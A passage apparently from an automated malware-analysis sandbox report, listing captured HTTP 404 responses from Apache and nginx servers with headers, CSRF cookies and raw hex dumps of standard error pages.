75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:30 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/htmlData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Fri, 10 Jan 2025 15:42:32 GMTServer: ApacheContent-Length: 389Connection: closeContent-Type: text/html; charset=utf-8Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 77 69 6e 64 6f 77 73 2d 31 32 35 32 22 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><meta http-equiv="Content-Type" content="text/html; charset=windows-1252"><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 10 Jan 2025 15:42:38 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2BAC77301CE331898FF2AF5DDCA8E709C19D02B8BC80A5F6DFFF4B3B7D01Set-Cookie: _csrf=6c69579958ed0c991320ab80f32bc9ff2d20d45d2426e21589aa2e6f8f253655a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22ViUHRtJmdzTkEEH8FUwB1vPvLxXyFhMS%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 6b 50 50 63 6e 44 67 71 39 73 79 30 32 37 79 52 4b 67 32 4a 34 30 66 6a 4a 51 4c 73 64 79 65 41 75 32 32 4f 4a 4c 7a 4f 6d 6b 4c 47 6d 6f 6e 55 61 6c 36 38 6f 64 43 68 36 50 70 76 53 4d 48 62 41 62 5a 53 51 4e 30 42 64 5f 62 33 46 64 5a 64 2d 71 62 58 45 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 10 Jan 2025 15:42:41 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B2EA5E1440509EDF1D35A7BA1797064662FBD6D8431FC423EE8E18D6B00Set-Cookie: _csrf=46d9ec36021cecbb201271f7429b7c09ce22841aaada7658682c9161af282745a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22sFeGQzX5g4VcFsVgC3KWW-AWyMUqmh7U%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 35 4a 50 4d 65 7a 55 41 5a 47 75 66 49 6c 5f 77 33 4a 59 37 4c 6c 57 79 36 55 5a 62 4d 49 69 45 2d 7a 61 6e 39 69 74 68 78 56 65 58 31 61 6b 38 5a 48 6f 38 58 76 67 57 43 5a 4f 61 35 57 31 4a 46 6f 47 69 45 51 77 64 79 64 4f 43 65 5f 4b 48 52 67 6e 79 41 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 10 Jan 2025 15:42:43 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B1A9645E836DA16F8DD7CC6037B835F7FC2FFFD1F56941C22E61C784E00Set-Cookie: _csrf=769a271172a1a33600c574635817d7b163ee9397884e6a4b356173dd8438dedba%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22kN8BQdzrJHiDz2F7jvTAR5UZ6-2wG0eW%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 65 61 71 74 2d 73 38 4e 37 41 68 72 45 72 32 34 62 39 52 6b 62 68 68 77 46 5a 6e 46 41 72 48 38 44 57 53 44 78 4c 4a 42 31 54 45 53 35 4a 57 34 6e 6d 6d 57 65 69 46 61 31 50 77 56 35 69 4a 5a 63 67 5a 42 32 4a 63 33 35 4b 59 37 53 62 47 7a 39 58 47 77 5a 67 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.20.1Date: Fri, 10 Jan 2025 15:42:47 GMTContent-Type: text/html; charset=UTF-8Transfer-Encoding: chunkedConnection: closeX-Trace: 2B4F552EDAF337E5D7845D348EA10E745893F97286B7A63F0677EE1DD900Set-Cookie: _csrf=219e8a8ce99fa31eb463941af2ec4cb7ba5d4d144b3a88777ee74154657dea82a%3A2%3A%7Bi%3A0%3Bs%3A5%3A%22_csrf%22%3Bi%3A1%3Bs%3A32%3A%22Ue2GhjZqRadBiFa74w7Ls5SA7NQhitfR%22%3B%7D; path=/; HttpOnlyData Raw: 33 31 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 70 61 72 61 6d 22 20 63 6f 6e 74 65 6e 74 3d 22 5f 63 73 72 66 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 63 73 72 66 2d 74 6f 6b 65 6e 22 20 63 6f 6e 74 65 6e 74 3d 22 7a 6e 4c 4e 30 33 39 44 34 4a 57 75 47 7a 79 45 58 4a 56 2d 73 78 47 65 72 79 4d 37 5a 61 56 74 63 5a 46 71 6d 74 52 73 42 47 65 62 46 5f 2d 55 46 79 6d 36 35 50 78 36 57 4d 59 31 30 78 2d 45 4a 65 6d 59 62 30 68 51 39 69 78 47 33 7a 76 79 76 52 68 69 4e 51 3d 3d 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 69 74 65 2e 63 73 73 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 77 72 61 70 22 3e 0a 20 20 20 20 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 73 69 74 65 2d 65 72 72 6f 72 22 3e 0a 0a 20 20 20 20 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 20 28 23 34 30 34 29 3c 2f 68 31 3e 0a 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 61 6c 65 72 74 20 61 6c 65 72 74 2d 64 61 6e 67 65 72 22 3e 0a 20 20 20 20 20 20 20 20 50 61 67 65 20 6e 6f 74 20 66 6f 75 6e 64 2e 20 20 20 20 3c 2f 64 69 76 3e 0a 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 54 68 65 20 61 62 6f 76 65 20 65 72 72 6f 72 20 6f 63 63 75 72 72 65 64 20 77 68 69 6c 65 20 74 68 65 20 57 65 62 20 73 65 72 76 65 72 20 77 61 73 20 70 72 6f 63 65 73 73 69 6e 67 20 79 6f 75 72 20 72 65 71 75 65 73 74 2e 0a 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 3c 70 3e 0a 20 20 20 20 20 20 20 20 50 6c 65 61 73 65 20 63 6f 6e 74 61 63 74 20 75 73 20 69 66 20 79 6f 75 20 74 68 69 6e 6b 20 74 68 69 73 20 69 73 20 61 20 73 65 72 76 65 72 20 65 72 72 6f 72 2e 20 54 68 61 6e 6b 20 79 6f 75 2e 0a 20 20 20 20 3c 2f 70 3e 0a 0a 3c 2f 64 69 76 3e 0a 3c 2f 64 69 76 3e 0a 0a 3c 2f 62 6f 64 Data Ascii: 31b<!DOCTYPE html><html lang="en-US"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1"> <meta name="
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.1Date: Fri, 10 Jan 2025 15:43:00 GMTContent-Length: 0Connection: closeX-Rate-Limit-Limit: 5sX-Rate-Limit-Remaining: 19X-Rate-Limit-Reset: 2025-01-10T15:43:05.9036713Z
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Fri, 10 Jan 2025 15:44:39 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Length: 548Content-Type: text/htmlDate: Fri, 10 Jan 2025 15:44:41 GMTServer: nginxConnection: closeData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
